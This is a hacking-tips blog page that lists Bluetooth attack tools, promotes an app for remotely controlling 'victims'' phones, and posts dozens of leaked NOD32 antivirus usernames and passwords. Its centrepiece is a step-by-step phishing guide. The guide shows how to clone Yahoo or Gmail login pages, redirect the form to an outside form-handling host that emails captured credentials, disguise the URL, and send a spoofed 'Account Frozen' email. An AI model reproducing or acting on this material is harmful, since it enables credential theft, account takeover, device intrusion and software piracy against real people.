Welcome To The Hacker Club 4U

On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet

Hacking

Click Here To Know Many Tricks and Tips Of HACKING facebook,twitter and other accounts and passwords

Hacking Safety And Security

Click Here to know how to protect your computer and inetrnet from hacking and know hacking safety and security tips and tricks

Facebook And Twitter

Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login

Gmail And Yahoo

Click On Above Picture For GMAIL Hacking And Security Tips . And.Click On This Title For YAHOO Hacking and security tips


Some software for bluetooth hacking to hack any bluetooth enabled phone or device.

Hii! This is Pc Hackers Guru Know Many about Hacking

Bluetooth provides an easy way pf communication for a wide range of mobile devices to communicate with each other without the need for cables or wires and transfer files in between them.
Note: But it can be a potential threat for a person privacy.
There are large amount of information that is available on internet about on how you can hack various blue tooth enabled devices.
So Today i am going to list out some Freewares For Blutooth Hacking.

Various Softwares For Bluetooth Hacking
BlueScanner – It search out for Bluetooth devices and extract much amount of information of the newly discovered device. Download BlueScan.
BlueSniff – It is a simple utility for discovering hidden Bluetooth devices. Download BlueSniff.
BlueBugger -It simply exploits the BlueBug vulnerability of the bluetooth enabled devices. By exploiting these vulnerabilities and leakes, you can gain access to the phone-book, calls lists and other information of the bluetooth device. Download BlueBugger.
BTBrowser – Is a Bluetooth Browser is a J2ME app. which can browse and explore all the  surrounding Bluetooth devices. Browse to different kind of device information. Download BTBrowser.
BTCrawler -It is a Bluetooth scanner for Windows Mobile based devices. It can implement BlueJacking and BlueSnarfing attacks. Download BTCrawler.
If you find any of the above utilities usefull leave a comment here.

How to Make FREE Calls to Landline and Mobile phones

Hii! This is Pc Hackers Guru Know Many about Hacking
Make FREE calls quickly
Simply type gizmocall.com/18005551212 into your browsers address bar.
(put the number you want to dial in place of 18005551212)
Make FREE calls to landline and mobile phones in over 60 countries by participating in the All Calls Free plan.
Users NEW to the All Calls Free plan get 20 minutes of free calling simply by getting ONE friend to sign up for a new Gizmo account. There are no commitments and no hidden fees.

Get Started Now!
  1. Tell a friend to download Gizmo5 and have them add their phone number to their profile.
    img-calls-1 Free Calls
  2. Add each other to your contact lists and you can call that person for FREE using Gizmo5.
    img-calls-3 Free Calls
  3. Be sure to make at least 1 Gizmo5 to Gizmo5 call per week or your free minutes will expire.
    img-calls-free-app Free Calls

  • Download Softwares

1 poivY Rates downloadnow Free Calls Kuwait
2 VoipBuster Rates downloadnow Free Calls Thailand
3 VoipStunt Rates downloadnow Free Calls UK, USA
4 InternetCalls Rates downloadnow Free Calls Egypt, Pakistan
5 InterVoip Rates downloadnow Free Calls Iraq, Lebanon, Palestine, Qatar, Sudan
6 LowrateVoip Rates downloadnow Free Calls Bangladesh, Jordan, Indonesia, Iraq, Malaysia Thailand, UK, USA
7 FreeCall Rates downloadnow Free Calls Russia
8 SMSListo Rates downloadnow Free Calls Sudan, Syria, China
9 WebCallDirect Rates downloadnow Free Calls India, Pakistan, Philippines, Malaysia
10 JustVoip Rates downloadnow Free Calls Russia
11 12Voip Rates downloadnow Free Calls Bahrain, China, Sri Lanka
12 DialNow Rates Phone-to-Phone Use if you live in a FREE Call Country!.
13 nonoh Rates Phone-to-Phone Use if you live in a FREE Call Country!.
14 VoipWise Rates downloadnow Free Calls
15 BudgetSIP Rates downloadnow Free Calls We create your SIP account.
16 Calleasy Rates Phone-to-Phone Web Call
17 SIPDiscount Rates for SIP Devices
18 SMSdiscount Rates downloadnow Free Calls India, Morocco, Turkey
19 VoipCheap Rates downloadnow Free Calls
20 VoIPRaider Rates downloadnow Free Calls

How to Hack Gmail or Yahoo or Hotmail or Any Other( New Version)

Hii! This is Pc Hackers Guru Know Many about Hacking
In the previous version of “how to hack gmail or yahoo or hotmail or any other” One problem faced was that whenever the victim clicks on login a message would come saying “This page will send your information through email” which could sometime fail your hack. But in this new version this problem is eliminated and this is has become more fullproof than the previous version.
First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.
Now follow the following steps :
  1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com
  2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.
  3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
  4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with <form method=”post” action=”https://login.yahoo.com/config/login?” autocomplete=”off” name=”login_form”> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))
  5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
    put the following code after placing your form id:
<form name=”New_Form” action=”http://www.webformdesigner.net/wfd_f2.php?id=Your Form ID Here” method=”post” enctype=”application/x-www-form-urlencoded” onsubmit=”return New_Form_CF();”>
Now Save the yahoofake.html.
To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.
First of all upload your page using some free webhosting services. Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”.
Now select your site name as mail.yahoo.com/support. You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.
Now send a fake mail from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.
After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked.
If you have your own ideas plz write it as comment to this post. Your participation is always appreciated. Good Luck !


Super Bluetooth Hacker(Latest Version)

Hii! This is Pc Hackers Guru Know Many about Hacking

This is a New Version of Super Bluetooth Hack for Conventional and Mobile-based Symbian. This program through MDM can be used to control other people’s mobile phone at a distance (10-15 metres, it’s Then)

Super Bluetooth hack New 2008
More in New Version :
1) Connect via BT/Irda
2) Reading SMS
3) Changing time/alarms
4) Pressing keys…

What else can you do once connected to a another phone via blue tooth?
1) Read SMS matches.
2) Turn off telephone.
3) Switch on music.
4) Choose modes (normal, without sound …)
5) Block Phone.
6) Read his Contacts
7) Change Profile
8) Play his Ringtone even if phone is on silent
9) Restore Factory Settings.
10) Restart the phone
11) Change Ringing Volume
And here comes the best
“Call from his phone” it includes all call functions like hold etc.
And much, much more

Install:
1) Download
2) Pour on the mobile
3) Run the Installer (what you download, incidentally need JAVA)
4) He finds it, and you will be able to run software
5) Choose the language and going configured
6) Click Connection
7) Click search devices
8) Choose the “victim”
9) AND MANAGE
Download

 

Gmail Hacking Account tools

Hii! This is Pc Hackers Guru Know Many about Hacking

A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Defcon hackers’ conference in Las Vegas.
Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.
When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.
Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SLL connections are slower.
The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks. Todd Mumford, from the SEO company called SEO Visions Inc, states “This can be a serious problem for Internet Marketers who travel often and use their wireless laptops and Gmal services often and do not always have access to a secure connection”
Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.”
If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.

Tools For hacking bluetooth devices

Hii! This is Pc Hackers Guru Know Many about Hacking
Bluetooth technology is great. No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?).
If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them.
This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.
Discovering Bluetooth Devices
BlueScanner – BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. Download BlueScan.
BlueSniff – BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. Download BlueSniff.
BTBrowser – Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 – the Java Bluetooth specification. Download BTBrowser.
BTCrawler -BTCrawler is a scanner for Windows based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Download BTCrawler.
Hacking Bluetooth Devices
BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. Download BlueBugger.
CIHWB – Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Download CIHWB.
Bluediving – Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. Download Bluediving.
Transient Bluetooth Environment Auditor – T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Download T-BEAR.
Bluesnarfer – Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. Download Bluesnarfer.
BTcrack – BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Download BTcrack.
Blooover II – Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. Download Blooover II.
BlueTest – BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. Download BlueTest.
BTAudit – BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. Download BTAuding.

Some Hacked Username & Password Of Nod32 Antivirus By drsukhjinderbhullar@gmail.com

Hii! This is Pc Hackers Guru Know Many about Hacking
 There are some hacked username & password of nod 32 antivirus
Username: EAV-31334716
Password: mv8f45ekcv
Expiry Date: 24.11.2010

Username: EAV-31368165
Password: uvf5kndhsk
Expiry Date: 24.11.2010

Username: EAV-31374591
Password: uakukfatuc
Expiry Date: 25.11.2010

Username: EAV-31374920
Password: d78scmj8bd
Expiry Date: 25.11.2010

Username: EAV-31526815
Password: nvm2ahe5rs
Expiry Date: 30.11.2010

Username: EAV-31527646
Password: a5p7cxrr87
Expiry Date: 30.11.2010

Username: EAV-31527649
Password: txv86k3m2e
Expiry Date: 30.11.2010

Username: EAV-31619600
Password: smdt6eejr7
Expiry Date: 02.12.2010

Username: EAV-31620201
Password: c3pu7ccv4u
Expiry Date: 02.12.2010

Username: EAV-31620626
Password: 5273hb4kax
Expiry Date: 02.12.2010

Username: EAV-31934012
Password: 3c72artrsb
Expiry Date: 12.12.2010

Username: EAV-31934114
Password: tpms62ap7p
Expiry Date: 12.12.2010?

Username:TRIAL-33298511
nod32key:amepeu5ass

Username:TRIAL-33298509
nod32key:4xetk3sksx

Username:TRIAL-33298505
nod32key:6v2msmffba

Username:TRIAL-33298503
nod32key:xa2pxs7sae

Username:TRIAL-33298501
nod32key:rk2t5xu48k

Username:TRIAL-33235884
nod32key:d8vj44×7ju

Username:TRIAL-33329342
Password:n58habeb3h

Username:TRIAL-33329362
Password:7vjr2ukdmx

Username:TRIAL-33329383
Password:cndeekdhsa

Username:TRIAL-33329410
Password:tmvhmfhu7n

Username:TRIAL-33329428
Password:6r8uh8carb

Username:TRIAL-33329445
Password:k2vkbfjr6f

Username:TRIAL-33329789
Password:aj3np7rt6r

Username:TRIAL-33329812
Password:th5h5nj53f
Like on Facebook

Recommend us on Google!

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More